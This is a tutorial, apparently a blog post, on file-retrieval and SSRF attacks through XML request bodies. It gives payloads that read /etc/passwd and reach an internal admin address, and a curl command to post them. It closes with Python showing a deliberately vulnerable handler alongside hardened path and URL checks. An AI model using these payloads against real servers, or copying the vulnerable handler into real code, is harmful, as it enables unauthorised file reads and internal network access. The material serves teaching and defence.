Reflected File Retrieval and Server Side Request Forgery in XML

First, what these terms actually mean. Reflected file retrieval (RFR), as the term is used here, is when an attacker can make a vulnerable web application read a file from its own server, named by attacker-controlled input, and send the contents back in the response. Server side request forgery (SSRF) is when the attacker supplies a URL and the server fetches it, so the server ends up making requests to destinations it was never meant to reach, typically hosts on its internal network. Neither is specific to XML: the XML body is only the transport for the path or the URL.
Now, let’s get our hands dirty and see how we can use XML to perform these attacks!
Step 1: Find a vulnerable web application that uses XML for data exchange. This could be an API endpoint or a file upload feature that accepts XML files as input. For the purpose of this tutorial, let’s assume we have found such an application and it looks something like this:

<request>
  <file>path/to/your/file</file> <!-- the path of the file the server should return -->
</request>

Step 2: Craft a malicious XML payload that carries the RFR or SSRF attack. For example, to perform an RFR against our vulnerable web application, we change the contents of the `<file>` element as follows:

<request>
  <file>/etc/passwd</file> <!-- any path the server process can read; nothing on the server checks it -->
</request>

Keep the path on one line with no surrounding whitespace, so a handler that does not trim the element text still opens the file. The fix belongs on the server side: resolve the requested path, serve only files under the directory the endpoint is meant to expose, and restrict what the endpoint may access at all.

This will cause the server to read `/etc/passwd` and send us its contents. Pretty cool, right? The same endpoint can be turned into an SSRF if it also accepts a `<url>` element whose target the server fetches:

<request>
  <url>http://192.168.0.1/admin</url> <!-- an address on the server's internal network, not reachable from outside -->
</request>

This will cause the server to make a GET request to `http://192.168.0.1/admin` on our behalf. That address is reachable from the server but not from us, so the response can expose an internal admin interface or any other service that trusts requests coming from inside the network; what we can do from there depends on what that service does with an unauthenticated request.
Step 3: Send our malicious XML payload to the vulnerable web application using your favorite tool, such as curl or Burp Suite. For example:

# Post payload.xml as the request body; the Content-Type header tells the endpoint to parse it as XML.
# --data-binary sends the file byte for byte (plain --data strips newlines from the file).
curl -X POST \
  -H "Content-Type: text/xml" \
  --data-binary @payload.xml \
  http://example.com/api/upload

And that’s it! The response to the first payload carries the file contents, and the second payload makes the server issue the internal request for us.
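As an added, self-contained example that is not part of the original tutorial, here is the endpoint from Steps 1 to 3 written in Python, first with the bug the payloads above exploit and then with the checks the fix calls for: path confinement for the `<file>` element and a scheme, allowlist and address check for the `<url>` element. The element names `<request>`, `<file>` and `<url>`, the sandbox file layout and the allowlist hosts are assumptions; the code runs offline, so it does not fetch the URL but only reports whether the fetch would be allowed.

```python
import ipaddress
import os
import tempfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed payloads in the shape the tutorial shows; the element names are an assumption.
FILE_PAYLOAD = b"<request><file>/etc/passwd</file></request>"
URL_PAYLOAD = b"<request><url>http://192.168.0.1/admin</url></request>"


def parse_request(xml_bytes):
    """Return (file_path, url) from a <request> body; a missing element yields None."""
    root = ET.fromstring(xml_bytes)
    if root.tag != "request":
        raise ValueError("unexpected root element %r" % root.tag)

    def text_of(name):
        el = root.find(name)
        return el.text.strip() if el is not None and el.text else None

    return text_of("file"), text_of("url")


def vulnerable_read_file(file_path, base_dir):
    """The bug from Step 2: join() returns file_path unchanged when it is absolute,
    and '..' components walk out of base_dir, so any file the process can read comes back."""
    with open(os.path.join(base_dir, file_path), "rb") as fh:
        return fh.read()


def safe_read_file(file_path, base_dir):
    """Resolve symlinks and '..' first, then refuse anything that lands outside base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, file_path))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("path escapes %s: %s" % (base, file_path))
    with open(target, "rb") as fh:
        return fh.read()


def check_url(url, allowed_hosts=None):
    """SSRF guard for the <url> element. Returns None if the fetch may proceed, else a reason.
    A DNS name that passes the allowlist must still be resolved, and the resulting address
    checked and pinned, before connecting; that step is left out because this runs offline."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return "scheme not allowed"
    host = parts.hostname
    if host is None:
        return "no host"
    if allowed_hosts is not None and host.lower() not in allowed_hosts:
        return "host not on allowlist"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return None  # a DNS name, not a literal address; resolution is not done here
    if not addr.is_global:
        return "non-public address"  # private, loopback, link-local, unspecified, ...
    return None


def handle(xml_bytes, base_dir, allowed_hosts=None):
    """Dispatch a <request> body the way the tutorial's endpoint would, with the hardened checks."""
    file_path, url = parse_request(xml_bytes)
    if file_path is not None:
        try:
            return ("file", safe_read_file(file_path, base_dir))
        except (PermissionError, FileNotFoundError) as exc:
            return ("rejected", str(exc))
    if url is not None:
        reason = check_url(url, allowed_hosts)
        # A real handler would fetch here; offline we only report the decision.
        return ("fetch", url) if reason is None else ("rejected", reason)
    return ("rejected", "no <file> or <url> element")


def make_sandbox():
    """Constructed layout: a 'public' directory the app serves from, plus a secret outside it.
    Returns (public_dir, path_to_secret)."""
    root = tempfile.mkdtemp()
    public = os.path.join(root, "public")
    os.mkdir(public)
    with open(os.path.join(public, "report.txt"), "wb") as fh:
        fh.write(b"quarterly numbers")
    secret = os.path.join(root, "secret.txt")
    with open(secret, "wb") as fh:
        fh.write(b"db password")
    return public, secret


if __name__ == "__main__":
    public, secret = make_sandbox()
    print(vulnerable_read_file("../secret.txt", public))  # the vulnerable handler leaks the secret
    print(handle(b"<request><file>../secret.txt</file></request>", public))  # hardened: rejected
    print(handle(URL_PAYLOAD, public))  # rejected, non-public address
    print(handle(b"<request><url>https://example.com/x</url></request>", public, {"example.com"}))
```

The XML parser is not the weak point in this design; the bug is entirely in what the handler does with the text it pulls out of the elements, which is why the fix is path confinement and a URL policy rather than anything in the parser. Note that `check_url` only inspects literal addresses: a hostname on the allowlist still has to be resolved and the resolved address re-checked by the code that actually connects, or a name that resolves to an internal address slips through.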

SICORPS